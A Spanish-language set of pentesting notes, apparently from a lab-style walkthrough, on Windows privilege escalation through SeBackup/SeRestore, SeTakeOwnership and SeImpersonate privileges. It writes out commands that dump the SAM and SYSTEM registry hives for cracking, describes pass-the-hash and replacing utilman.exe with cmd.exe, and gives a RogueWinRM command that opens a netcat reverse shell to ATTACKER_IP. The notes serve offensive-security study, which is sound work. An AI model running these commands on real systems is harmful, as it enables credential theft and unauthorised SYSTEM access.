search

Abusing dangerous privileges

Cada usuario tiene sus privilegios asignados en Windows, se puede ver así con: whoami \priv

hashtag
SeBackup / SeRestore

Esto privilegios, permiten al usuario leer y escribir cualquier archivo del sistema, ignorando la DACL existente. La idea detrás de este privilegio es permitir al usuario realizar copias de seguridad sin requerir permisos de administrador.

Para obtener la consola con esos privilegios, tenemos que ejecutarla como administrador y introducir nuestra contraseña

Ahora vemos nuestros privilegios con whoami \priv

C:\> whoami /priv 

PRIVILEGES INFORMATION 
---------------------- 

Privilege Name                Description                    State
============================= ============================== ======== 
SeBackupPrivilege              Back up files and directories  Disabled SeRestorePrivilege             Restore files and directories  Disabled SeShutdownPrivilege            Shut down the system           Disabled SeChangeNotifyPrivilege        Bypass traverse checking       Enabled SeIncreaseWorkingSetPrivilege  Increase a process working set Disabled

Con esto podríamos hacer una copia de seguridad de los hahes SAM y SYSTEM

C:\> reg save hklm\system C:\Users\victim\system.hive 
The operation completed successfully. 

C:\> reg save hklm\sam C:\Users\victim\sam.hive 
The operation completed successfully.

Esto cread 2 archivos que podemos compartirnos por SMB a la maquina kali (atacante) para crakearlos

Esto crea un recuso compartido a nivel de red llamado public, que apunta a share, nuestro directorio compartido. Que para acceder requiere el nombre de usuario y la contraseña de nuestra sesión actual de windows. Ahora podemos utilizar el comando copy para compartir el archvio que queramos:

Ahora con impacket recuperamos los hahes de las contraseñas de estos users

Ahora podemos utilizar el hash del Administrator para hacer un ataque Pass-the-Hash y tener acceso con privilegios SYSTEM con psexec

hashtag
SeTakeOwnership

Este privilegio permite a un usuario tomar propiedad de cualquier objeto en el sistema, incluyendo archivos y claves de registro.

Lo primero abrir la terminal como administrador para lanzar whoami \priv

Ahora abusaremos de la utilman.exe para escalar el privilegio. Esta es una aplicación integrada de Windows que se utiliza para dar opciones de "Facilidad" en al pantalla de bloqueo

Este se ejecuta con privilegios del Sistema, asi que si remplazamos el binario a cualquier payload, conseguiremos esos permiso

Ser el propietario de un fichero no significa necesariamente que tengas privilegios sobre él, pero siendo el propietario puedes asignarte los privilegios que necesites. Para dar a tu usuario permisos completos sobre utilman.exe puedes usar el siguiente comando:

Ahora solo hace falta sustituir el utilman.exe por cmd.exe

Ahora para activar el ultiman, solo hace falta darle al botón de lock de pantalla en el inicio

Y darle al botón de "Ease od access" que ejecuta utilman.exe -> ahora cmd.exe con privilegios de SISTEMA.

hashtag
SeImpersonate / SeAssignPrimaryToken

En este caso, para hacer la escalada, necesitamos dos condiciones: 1º Crear un proceso para que los usuarios puedan conectarse y autenticarse para suplantarlo 2º Encontrar una forma de forzar a los usuarios con privilegios (Adminsitrator) a conectarse y autenticarse en el proceso malicioso generado

Utilizare el exploit RogueWinRM

Asumiendo que ya hemos comprometido un sitio web que se ejecuta en IIS y que hemos plantado un web shell en http://10.10.56.114/

Para utilizar RogueWinRM, primero necesitamos subir el exploit a la máquina victima.

Ahora me pongo en escucha por nc en mi maquina de atacante user@attackerpc$ nc -lvp 4442

Y lanzo el exploit desde esa webshell

c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe ATTACKER_IP 4442"

PreviousPrivilege Escalation - WindowsNextAbusing Service Misconfigurations

Last updated